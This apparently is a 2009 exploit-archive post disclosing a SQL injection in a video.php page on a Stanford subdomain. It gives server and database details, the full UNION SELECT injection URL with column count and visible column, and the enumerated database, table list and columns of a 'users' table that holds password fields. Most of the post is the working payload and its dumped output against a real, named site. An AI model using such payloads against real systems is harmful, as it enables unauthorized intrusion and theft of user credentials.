Stanford.edu suffers from a remote SQL injection vulnerability.
9a9621de89ca6c600e90bbe229e829cf8a31da1b4cbea04108e14c889b3cd1f3
-----------------------------------------------------------------------------------------------
[+] Stanford.edu suffers from a remote SQL injection vulnerability
[+] Found By: Rohit Bansal
[+] Date: 06-02-2009
---------------------------------------------------------------------------------------------
Host Information
Server = Apache/2.2.3 (Debian) mod_fastcgi/2.4.2 PHP/5.2.0-8+etch13
mod_ssl/2.2.3 OpenSSL/0.9.8c WebAuth/3.6.0
Version = 5.0.51a-19~bpo40+1-log
Powered by = PHP/5.2.0-8+etch13
Current User = genvironmentwoo@www5.Stanford.EDU
Current Database = g_environment_woodsfacultydb
Supports Union = yes
Union Columns = 12
Url| http://woods.stanford.edu/cgi-bin/video.php?videoid=23
Vuln: http://woods.stanford.edu/cgi-bin/video.php?videoid=23 +and+1=0+ Union
Select 1 ,2,3, UNHEX(HEX([visible])) ,5,6,7,8,9,10,11,12
Comment: --
Visible Column: 4
Hexed: True
Database:g_environment_woodsfacultydb
information_schema
g_environment_woodsfacultydb
Tables:users
StudentGroups
adcouncil
agendas
announcements
biofuels
carbon
cccp
ecosystem
events
evp
evpIDseed
evpRFP
evploi
evppeople
evpreport
facultydb
globalwater
groundwater
homepage
images
locations
loiReviewers
loireview
mailinglist
news
newssource
pacsalmon
rfpreview
seeds
staff
staffCenters
users
video
waterwest
woodsnews
Columns: Table users
username
password
fullname
fname
lname
auth_state
timestamp
cryptword
---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] SecurenSafe, Schap.org, Infysec, Evilfinger,
---------------------------------------------------------------------------------------